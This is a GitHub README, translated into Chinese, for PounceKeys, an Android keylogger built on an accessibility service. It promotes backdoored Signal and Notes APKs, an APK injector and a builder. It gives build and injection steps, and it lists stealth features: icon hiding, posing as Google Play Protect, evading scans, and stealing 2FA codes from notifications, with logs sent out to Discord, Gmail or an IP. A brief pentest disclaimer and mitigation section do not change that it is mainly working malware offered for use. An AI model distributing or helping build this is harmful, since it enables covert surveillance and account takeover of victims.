NullPounce/pounce-keys

GitHub: NullPounce/pounce-keys

PounceKeys 是一款面向 Android 渗透测试的无障碍服务键盘记录工具,支持多渠道日志外发和应用注入。

Stars: 390 | Forks: 65

仅用于渗透测试 Android 应用!由于存在滥用风险,该项目可能会被归档或重构。

Android Keylogger

发送日志到 IP | Gmail | Discord
查看发布版本 · Wiki/FAQ · 请求功能 . Discord

# 下载(新构建器需要 JKD19) [Builder V2 直接链接](https://github.com/NullPounce/pounce-keys/releases/download/PounceKey's/PounceKeysBuilder_2.0.rar) 在 Android 15 版本上开启了 Google Play Protect 的 Android Studio 已通过测试,发送日志或 Play Protect 功能均无问题。 [Signal Messenger 后门](https://github.com/NullPounce/pounce-keys/releases/tag/Pounce-Keys-Signal) [Notes App 后门](https://github.com/NullPounce/pounce-keys/releases/tag/PounceKeys-FileManager) [Pounce-Keys-Gmail](https://github.com/NullPounce/pounce-keys/releases/tag/Pounce-Keys-Gmail) [Pounce-Keys-Discord](https://github.com/NullPounce/pounce-keys/releases/tag/Pounce-Keys-Discord) [PounceKeys-IP](https://github.com/NullPounce/pounce-keys/releases/tag/2.1) Inject.rar 位于构建器的发布部分 注入器并不适用于所有应用(适用于 Spotify 及其他少数应用) 在 VS Code 中打开 Source 文件夹,使用全部替换功能,将两处 "INSERT-WEBHOOK-URL-FROM-YOUR-CHANNEL-BOT" 替换为你自己的 bot token 运行:python -m inject 将要注入的 apk 放入 apk 文件夹中 点击 inject,等待程序停止卡顿,当文本框中出现文字时即表示完成 点击 inject 将 apk 拖放到 apktool GUI 的 build 选项卡中,并祈祷好运,如果构建成功,请启用该服务 # PounceKey 3.0 更新! - 支持多设备分类 - 全新 GUI! - 在 Android 13 及以下版本隐藏图标,而不是仅在 9 中有效 - 通知再次被记录并发送 - 在启用服务时发送系统信息 - “应该”现在会提醒用户启用该服务 - 更新了图标和文本“常规清理” - 从 Battery Health Service 更改为 Google Play Protect Service - 使用 Python eel 的全新 GUI 构建器 https://github.com/NullPounce/pounce-keys/assets/28081004/4160dec0-d2b0-4705-867a-833c447ec666 # 功能 ✅ 一个完全可用的带后门 Signal APK,内置恶意的键盘记录无障碍服务,还有一个带后门的 Notes 应用 ✅ 启用服务时发送系统信息 ✅ 支持 Android v5 - v13(12.1 版本除外,12.0 可正常工作) ✅ 完整的启动器隐藏功能,主屏幕或启动器上没有应用图标 ✅ 独一无二的自定义缓冲区,提高了日志的可读性 ✅ 即使在锁定状态下也会发送通知(在机主看到之前获取 Google 验证码) ✅ 捕获用户正在查看的屏幕上的几乎所有文本。 ✅ 无需在两端开放端口即可通过 WAN 工作 "Discord/Gmail" ✅ 开机自启动 "不需要重启" ✅ 可选择 IP | Gmail | Discord 来存储日志 ✅ 包含一个用于 IP 版本的自定义监听器 "已在 Linode VPS(每月 5 美元)上测试并可通过 WAN 正常工作" ✅ 记录所有用户输入,甚至包括外部和远程键盘 ✅ 通过 toast 和下拉消息提示用户启用该服务 ✅ 通过了 GOOGLE 病毒扫描 ✅ 包含一个可在 Windows 和 Linux 上运行的 GUI 构建器 ✅ 你可以选择:| verbose | 仅键盘记录 | 键盘记录和通知 | 以获得清晰的可读性 # 手动构建 第 1 部分 https://github.com/NullPounce/pounce-keys/assets/28081004/0406a386-a268-4668-af1b-515feba05e18 第 2 部分 https://github.com/NullPounce/pounce-keys/assets/28081004/c48aebe5-fcfb-41fe-a877-3a767a9ee3e5 下载 [APK TOOL GUI](https://github.com/AndnixSH/APKToolGUI) 并将下载的 APK 拖放到 decompile 选项卡中 接下来,在支持打开文件夹并执行全部替换功能的 IDE(“文本编辑器”,如 Visual Studio)中打开反编译后的文件夹 阅读发布说明中关于需要替换的值,保存后在 GUI 中进行编译 [旧 IP 版本说明](https://github.com/NullPounce/pounce-keys/wiki/Old-IP-version-notes) # 你的应用有漏洞吗?立即测试它们! 在你的开发工作流中使用 Pounce_keys 以确保你的应用免受键盘记录器的威胁,这对于银行应用来说是必须的,而且确实有一些应用存在漏洞! 举例来说,甚至 CalyxOS 的锁屏也存在漏洞,fennec 浏览器的 URL 栏受到保护但网页没有。Signal 甚至也存在漏洞! # 缓解措施 我能保护我的密码免受其害吗,即使在被入侵的情况下? 打开开发者选项,并在隐私设置下关闭“输入时显示密码”。 不要使用无障碍服务... 我该如何寻找它 检查 无障碍设置中是否有任何已下载的服务,或者是否有任何服务处于开启状态(名称并不重要)
标签:Android, DSL, JS文件枚举, 后门, 客户端加密, 数据展示, 红队, 逆向工具, 键盘记录